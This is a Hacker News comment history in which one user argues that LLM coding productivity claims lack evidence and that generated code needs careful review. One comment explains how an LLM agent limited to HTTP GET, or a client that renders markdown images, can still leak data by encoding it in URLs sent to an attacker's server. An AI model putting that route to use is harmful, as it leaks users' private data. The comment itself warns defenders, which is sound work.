Hacker Newsnew | past | comments | ask | show | jobs | submit | lunar_mycroft's commentslogin

That's the theory. In practice, if your UI is changing a lot, the data your UI needs is also changing a lot, meaning that your data API will either have a lot of churn or you'll allow a lot of flexibility in how untrusted clients can use it, which introduces it's own pile of issues.

For this to work, you'd have to fully specify the behavior of your program in the tests. Put another way, at that point your tests are the program. So the question is, which is a more convenient way to specify the behavior of a program: a traditional programming language, or tests written in that language. I think the answer should be fairly obvious.

Behavior does not need to be fully specified at the outset. It could be evaluated after the run. We've actually done this before in our own technology. We studied birds and their flight characteristics, and took lessons from that for airplane development. What is a bird but the output of a random walk algorithm selected by constraints bound by so many latent factors we might never fully grasp?

> Behavior does not need to be fully specified at the outset. It could be evaluated after the run.

This doesn't work when the software in question is written by competent humans, let alone the sort of random process you describe. A run of the software only tells you the behavior of the software for a given input, it doesn't tell you all possible behaviors of the software. "I ran the code and the output looked good" is no where near sufficient.

> We've actually done this before in our own technology. We studied birds and their flight characteristics, and took lessons from that for airplane development.

There is a vast chasm between "bioinspiration is sometimes a good technique" and "genetic algorithms are a viable replacement for writing code".


Genetic algorithms created our species, which are far more complex than anything we have written in computer science. I think they have stood up to the tests of creating a viable product for a given behavior.

And with future compute, you will be able to evaluate behavior across an entire range of inputs for countless putative functions. There will be a time when none of this is compute bound. It is today, but in three centuries or more?



> Genetic algorithms created our species, which are far more complex than anything we have written in computer science. I think they have stood up to the tests of creating a viable product for a given behavior.

Yes, and our species is a fragile barely functioning machinery with an insane number of failing points, and hillariously bad and inefficiently placed components.


There is no such thing as read only network access. For example, you might think that limiting the LLM to making HTTP GET requests would prevent it from exfiltrating data, but there's nothing at all to stop the attacker's server from receiving such data encoded in the URL. Even worse, attackers can exploit this vector to exfiltrate data even without explicit network permissions if the users client allow things like rendering markdown images.

As an aside, both those statements were wrong. People who learned to drive well after cars were widely adopted were at no particular disadvantage when and if they decided to adopt the technology. You can see this is true by noting that at this point, no one alive learned to drive when cars first came out.

The core of your argument is that using LLMs is a skill that takes a significant amount of time to master. I'm not going to argue against that (although I have some doubts) because I think it's ultimately irrelevant. The question isn't "is prompting a skill that you'll need to be an effective software developer in the future" but "what other skills will you need to do so", and regardless of the answer you don't need to start adopting LLMs right away.

Maybe AI gets good enough at writing code that it's users' knowledge of computer science and software development becomes irrelevant. In that case, approximately everyone on this site is just screwed. We're all in the business of selling that specialized knowledge, and if it's no longer required then companies aren't going to pay us to operate the AI, they're going to pay PMs, middle managers, executives, etc. But even that won't be particularly workable long term, because all their customers will realize they no longer need to pay the companies for software either. In this world, the price of software goes to zero (and hosting likely gets significantly more commoditized than it is now). Any time you put into learning to use LLMs for software development doesn't help you keep making money selling software, and actually stops you from picking up a new career.

If, on the other hand, CS and software engineering knowledge is still needed, companies will have to keep/restart hiring or training new developers. In terms of experience using AI, it is impossible for anyone to have less experience than these new developers. We will, however, have much more experience and knowledge of the aforementioned non-LLM skills that we're assuming (in this scenario) are still necessary for the job. In this scenario you might be better off if you'd started learning to prompt a bit earlier, but you'll still be fine if you didn't.


> People seem to believe that there is a burden of proof. There is not. What do I care if you are on board?

The burden of proof rests on those making the positive claim. You say you don't care if others get on board, but a) clearly a lot of others do (case in point: the linked article) and b) a quick check of your posts in this very thread shows that you are indeed making positive claims about the merits of LLM assisted software development.


> If you can solve "measure programming productivity with data" you'll have cracked one of the hardest problems in our industry.

That doesn't mean that we have to accept claims that LLMs drastically increase productivity without good evidence (or in the presence of evidence to the contrary). If anything, it means the opposite.


At the is point the best evidence we have is a large volume of extremely experienced programmers - like antirez - saying "this stuff is amazing for coding productivity".

My own personal experience supports that too.

If you're determined to say "I refuse to accept appeal to authority here, I demand a solution to the measuring productivity problem first" then you're probably in for a long wait.


> At the is point the best evidence we have is a large volume of extremely experienced programmers - like antirez - saying "this stuff is amazing for coding productivity".

The problem is that we know that developers' - including experienced developers' - subjective impressions of whether LLMs increase their productivity at all is unreliable and biased towards overestimation. Similarly, we know that previously the claims of massive productivity gains were false (no study reputable showed even a 50% improvement, let alone the 2x, 5x, 10x, etc that some were claiming, indicators of actual projects shipped were flat, etc). People have been making the same claims for years at this point, and every time when we actually were able to check, it turned out they were wrong. Further, while we can't check the productivity claims (yet) because that takes time, we can check other claims (e.g. the assertion that a model produces code that doesn't need to be reviewed by a human anymore), and those claims do turn out to be false.

> If you're determined to say "I refuse to accept appeal to authority here, I demand a solution to the measuring productivity problem first" then you're probably in for a long wait.

Maybe, but my point still stands. In the absence of actual measurement and evidence, claims of massive productivity gains do not win by default.


There is also plenty of extremely experienced programmers saying "this stuff is useless for programming".

If a bunch of people say "it's impossible to go to the moon, nobody has done it" and Buzz Aldrin says "I have been to the moon, here are the photos/video/NASA archives to prove it", who do you believe?

The equivalent of "we've been to the moon" in the case of LLMs would be:

"Hey Claude, generate a full Linux kernel from scratch for me, go on the web to find protocol definitions, it should handle Wifi, USB, Bluetooth, and have WebGL-backed window server"

And then have it run in a couple of hours/days to deliver, without touching it.

We are *far* from this


OK then, new analogy.

If a bunch of people say "there are no cafes in this town that serve bench on a Sunday" and then Buzz Aldrin says "I just had a great brunch in the cafe over there, here's a photo", who would you listen to?


Well sure, but... that's anecdotical evidence. It's not a formal proof, with studies, etc

Also in the age of AI this argument would be flawed precisely because that "photo" from Buzz Aldrin could be AI-generated, but that's beside the point


Be honest: how many things do you do in your day-to-day SW tasks that have been formally proven and have studies supporting it?

That's just... not the point of that discussion?

1. Most of CS has been formally proven (that's what it's called computer science)

2. Here we were discussing someone who pretends to have "facts" and then just say "just play with it you will understand"...


Check "confirmation bias": of course the few that speak loudly are those who:

- want to sell you AI

- have a popular blog mostly speaking on AI (same as #1)

- the ones for whom this productivity ehnancement applies

but there's also 1000's of other great coders for whom:

- the gains are negligible (useful, but "doesn't change fundamentally the game")

- we already see the limits of LLMs (nice "code in-painting", but can't be trusted for many reasons)

- besides that, we also see the impact on other people / coders, and we don't want that in our society


Many issues have been pointed in the comments, in particular the fact that most of the things that antirez speaks about is how "LLMs make it easy to fill code for stuff he already knows how to do"

And indeed, in this case, "LLM code in-painting" (eg let the user define the constraints, then act as a "code filler") works relatively nicely... BECAUSE the user knows how it should work, and directed the LLM to do what he needs

But this is just, eg, 2x/3x acceleration of coding tasks for good coders already, this is neither 100x, nor is it reachable for beginner coders.

Because what we see is that LLMs (for good reasons!!) *can't be trusted* so you need to have the burden of checking their code every time

So 100x productivity IS NOT POSSIBLE simply because it would be too long (and frankly too boring) for a human to check the output of 100x of a normal engineer (as long as you don't spend 1000 hours upfront trying to encode all your domain in a theorem-proving language like Lean and then ensure the implementation is checked through it... which would be so costly that the "100x gains" would already have disappeared)


Why would you turn down a 2-3x productivity boost?

Nobody is saying we want to "turn down" (although, this would be a discussion between pros/cons if the boost is "only" 2x and the cons could be "this tech leads to authoritarian regimes everywhere)

What we are discussing here is whether this is a true step-change for coding, or this is merely a "coding improvement tool"


In the past week, I saw Opus 4.5 (being used by someone else) implement "JWT based authentication" by appending the key, to a (fake) header and body. When asked to fix this, it switched to hashing the key (and nothing else), and appending the hash instead. The "signature" still did not depend on the body, meaning any attacker could trivially forge an arbitrary body, allowing them to e.g. impersonate any user they wanted to.

Do I think Opus 4.5 would always make that mistake? No. But it does indicate that the output of even SotA models needs careful review if the code actually matters.


Interestingly, things like domain name registrations and new github repositories didn't have the an inflection point in recent years [0]. This means it's almost certainly that a greater portion of new projects are getting submitted as Show HN, not that there's more new projects overall.

[0] https://mikelovesrobots.substack.com/p/wheres-the-shovelware...


Really suprising result that new public Github repositories haven't increased much. I wonder what actually caused the downtrend?

I'd be curious to see this article updated in a few months; post Opus 4.5 and other model updates we had towards the end of 2025.


> It's like the articles point: we don't do assembly anymore and no one considers gcc to be controversial and no one today says "if you think gcc is fun I will never understand you, real programming is assembly, that's the fun part"

The compiler reliably and deterministically produces code that does exactly what you specified in the source code. In most cases, the code it produces is also as fast/faster than hand written assembly. The same can't be said for LLMs, for the simple reason that English (and other natural languages) is not a programming language. You can't compile English (and shouldn't want to, as Dijkstra correctly pointed out) because it's ambiguous. All you can do is "commission" another

> Do you resent folks like us that do find it fun?

For enjoying it on your own time? No. But for hyping up the technology well beyond it's actual merits, antagonizing people who point out it's shortcomings, and subjecting the rest of us to worse code? Yeah, I hold that against the LLM fans.


That a coding agent or LLM is a different technology than a compiler and that the delta in industry standard workflow looks different isn’t quite my point though: things change. Norms change. That’s the real crux of my argument.

> But for hyping up the technology well beyond it's actual merits, antagonizing people who point out it's shortcomings, and subjecting the rest of us to worse code? Yeah, I hold that against the LLM fans.

Is that what I’m doing? I understand your frustration. But I hope you understand that this is a straw man: I can straw man the antagonists and AI-hostile folks but the point is the factions and tribes are complex and unreasonable opinions abound. My stance is that people can dismiss coding agents at their peril, but it’s not really a problem: taking the gcc analogy, in the early compiler days there was a period where compilers were weak enough that assembly by hand was reasonable. Now it would be just highly inefficient and underperformant to do that. But all the folks that lamented compilers didn’t crumble away, they eventually adapted. I see that analogy as being applicable here, it may be hard to see the insanity of coding agents because we’re not time travelers from 2020 or even 2022 or 3. But this used to be an absurd idea and is now very serious and highly adopted. But still quite weak!! Still we’re missing key reliability and functionality and capabilities. But if we got this far this fast, and if you realize that coding agent training is not limited in the same way that e.g. vanilla LLM training is by being a verifiable domain, we seem to be careening forward. But by nature of their current weakness, absolutely it is reasonable not to use them and absolutely it is reasonable to point out all of their flaws.

Lots of unreasonable people out there, my argument is simply: be reasonable.


> Norms change. That’s the real crux of my argument.

Novelty isn't necessarily better as a replacement of what exists. Example: blockchain as fancy database, NFTs, Internet Explorer, Silverlight, etc.


No it’s certainly not, and if you do want to lump coding agents into blockchain and NFTs that’s of course your choice but those things did not spur trillions of dollars of infra buildout and reshape entire geopolitical landscapes and have billions of active users. If you want to say: coding agents are not truly a net positive right now, that’s I think a perfectly reasonable opinion to hold (though I disagree personally). If you want to say coding agents are about as vapid as NFTs that to me is a bit less defensible


As others has already been pointed out, not all new technologies that are proposed are improvements. You say you understand this, but the clear subtext of the analogy to compilers is that LLM driven development are a obvious improvement and if we don't adopt them we'll find ourselves in the same position as assembly programmers who refused to learn compiled languages.

> Is that what I’m doing?

Initially I'd have been reluctant to say yes, but this very comment is laced with assertions that we'd better all start adopting LLMs for coding or we're going to get left behind [0]

> taking the gcc analogy, in the early compiler days there was a period where compilers were weak enough that assembly by hand was reasonable. Now it would be just highly inefficient and underperformant to do that

No matter how good LLMs get at translating english into programs, they will still be limited by the fact that their input (natural language) isn't a programming language. This doesn't mean it can't get way better, but it's always going to have some of the same downsides of collaborating with another programmer.

[0] This is another red flag I would hope programmers would have learned to recognize. Good technology doesn't need to try to threaten people into adopting it.


My intention was to say: you won't get left behind you will just get left slightly behind the curve until things reach a point where you feel you have no choice but to join the dark side. Like gcc/assembly: sure maybe there were some hardcore assembly holdouts but any day they could and probably did jump on the bandwagon. This is also speculation, I agree, but my point is: not using LLMs/coding agents today is very very reasonable, and the limitations that people often bring up are also very reasonable and believable.

> No matter how good LLMs get at translating english into programs, they will still be limited by the fact that their input (natural language) isn't a programming language.

Right but engineers routinely convert natural language + business context into formal programs, arguably an enormously important part of creating a software product. What's any different here? Like a programmer, the creation process is two-way. The agent iteratively retrieves additional information, asks questions, checks their approach, etc etc.

> [0] This is another red flag I would hope programmers would have learned to recognize. Good technology doesn't need to try to threaten people into adopting it.

I think I was either not clear or you misread my comment: you're not going to get left behind any more than you want to. Jump in when you feel good about where the technology is and use it where you feel it should be used. Again: if you don't see value in your own personal situation with coding agents, that is objectively a reasonable stance to hold today.


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: